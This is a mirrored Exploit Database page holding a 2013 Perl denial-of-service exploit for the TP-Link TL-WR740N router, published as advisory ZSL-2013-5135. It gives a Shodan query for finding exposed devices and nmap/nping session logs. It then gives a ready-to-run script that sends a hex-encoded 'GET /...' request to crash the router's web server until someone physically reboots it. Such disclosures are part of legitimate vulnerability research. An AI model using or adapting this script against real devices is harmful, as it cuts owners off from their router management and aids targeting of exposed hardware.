TP-Link TL-WR740N Wireless Router – Denial of Service

• Exploit Database
• 121 阅读

• 作者： LiquidWorm
  日期： 2013-03-22
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/24866/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144

  #!/usr/local/bin/perl # # # TP-Link TL-WR740N Wireless Router Remote Denial Of Service Exploit # # # Vendor: TP-LINK Technologies Co., Ltd. # Product web page: http://www.tp-link.us # # Affected version: # # - Firmware version: 3.16.4 Build 130205 Rel.63875n (Released: 2/5/2013) # - Hardware version: WR740N v4 00000000 (v4.23) # - Model No. TL-WR740N / TL-WR740ND # # Summary: The TL-WR740N is a combined wired/wireless network connection # device integrated with internet-sharing router and 4-port switch. The # wireless N Router is 802.11b&g compatible based on 802.11n technology # and gives you 802.11n performance up to 150Mbps at an even more affordable # price. Bordering on 11n and surpassing 11g speed enables high bandwidth # consuming applications like video streaming to be more fluid. # # Desc: The TP-Link WR740N Wireless N Router network device is exposed to a # remote denial of service vulnerability when processing a HTTP request. This # issue occurs when the web server (httpd) fails to handle a HTTP GET request # over a given default TCP port 80. Sending a sequence of three dots (...) to # the router will crash its httpd service denying the legitimate users access # to the admin control panel management interface. To bring back the http srv # and the admin UI, a user must physically reboot the router. # # # ============================== Playground: ============================== # # Shodan: WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N" # # # nmap -sV 192.168.0.1 # # Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-19 04:53 Central European Standard Time # Nmap scan report for 192.168.0.1 # Host is up (0.00s latency). # Not shown: 999 closed ports # PORT STATE SERVICE VERSION # 80/tcp openhttpTP-LINK WR740N WAP http config # MAC Address: AA:BB:CC:DD:EE:FF (Tp-link Technologies CO.) # Service Info: Device: WAP # # Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . # Nmap done: 1 IP address (1 host up) scanned in 12.42 seconds # # -------------------------------------------------------------------------- # Changed Probe Directive in nmap-service-probes file [4 d range]: # - Line: 4682: Probe TCP GetRequest q|GET / HTTP/1.0\r\n\r\n| # + Line: 4682: Probe TCP GetRequest q|GET /... HTTP/1.0\r\n\r\n| # -------------------------------------------------------------------------- # # # nping -c1 --tcp -p80 192.168.0.1 --data "474554202f2e2e2e20485454502f312e310d0a0d0a" # # Starting Nping 0.6.01 ( http://nmap.org/nping ) at 2013-03-19 04:55 Central European Standard Time # SENT (0.0920s) TCP 192.168.0.101:19835 > 192.168.0.1:80 S ttl=64 id=21796 iplen=61seq=1961954057 win=1480 # RCVD (0.1220s) TCP 192.168.0.1:80 > 192.168.0.101:19835 RA ttl=64 id=0 iplen=40seq=0 win=0 # # Max rtt: 0.000ms | Min rtt: 0.000ms | Avg rtt: 0.000ms # Raw packets sent: 1 (75B) | Rcvd: 1 (46B) | Lost: 0 (0.00%) # Tx time: 0.04000s | Tx bytes/s: 1875.00 | Tx pkts/s: 25.00 # Rx time: 1.04000s | Rx bytes/s: 44.23 | Rx pkts/s: 0.96 # Nping done: 1 IP address pinged in 1.12 seconds # # -------------------------------------------------------------------------- # # # nmap -Pn 192.168.0.1 -p80 # # Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-19 04:57 Central European Standard Time # Nmap scan report for 192.168.0.1 # Host is up (0.00s latency). # PORT STATESERVICE # 80/tcp closed http # MAC Address: AA:BB:CC:DD:EE:FF (Tp-link Technologies CO.) # # Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds # # ============================= !Playground =============================== # # # Tested on: Router Webserver # # # Vulnerability discovered by Gjoko &apos;LiquidWorm&apos; Krstic # # Copyleft (c) 2013, Zero Science Lab # Macedonian Information Security Research And Development Laboratory # http://www.zeroscience.mk # # # Advisory ID: ZSL-2013-5135 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5135.php # # # 17.03.2013 #   use IO::Socket;   $ip="$ARGV[0]"; $port="$ARGV[1]";   print "\n\n\x20"."\x1f"x42 ."\n"; print "\x20\x1f"."\x20"x40 ."\x1f\n"; print "\x20\x1fTP-Link TL-WR740N httpd DoS Exploit \x1f\n"; print "\x20\x1f"."\x20"x40 ."\x1f\n"; print "\x20\x1f"."\x20"x7 ."\x16"x5 ."\x20"x15 ."\x16"x5 ."\x20"x8 ."\x1f\n"; print "\x20\x1f"."\x20"x9 ."\x16"."\x20"x19 ."\x16"."\x20"x10 ."\x1f\n"; print "\x20" ."\x1f"x42 ."\n"; print "\x20\x4" ."\x20"x40 ."\x4\n"; print "\x20" ."\x1e" x 42 ."\n";   if($#ARGV<1) { print "\n\n\x20\x20\x1a\x20Usage: $0 <ip> <port>\n\n"; exit(); }   $socket=IO::Socket::INET->new( Proto => "tcp", PeerAddr => $ip, PeerPort => $port );   $ta4ke="\x47\x45\x54\x20". "\x2f\x2e\x2e\x2e". "\x20\x48\x54\x54". "\x50\x2f\x31\x2e". "\x31\x0d\x0a\x0d". "\x0a";   print "\n\x20\x1a\x20Sending evil payload...\n"; sleep 2; print $socket "$ta4ke"; sleep 5; close $socket; print "\x20\x1a\x20HTTPd successfully poked.\n"; sleep 2; print "\x20\x1a\x20Verifying with Nmap...\n"; sleep 2; system("nmap -Pn $ip -p $port"); print "\n\x20\x1a\x20Playing goa-psy...\n"; sleep 2; system("start C:\\Progra~1\\Winamp\\winamp.exe http://scfire-ntc-aa01.stream.aol.com:80/stream/1008"); sleep 1; print "\x20\x1a\x20All Done!\n"; sleep 1;   # Codename: Threetwoees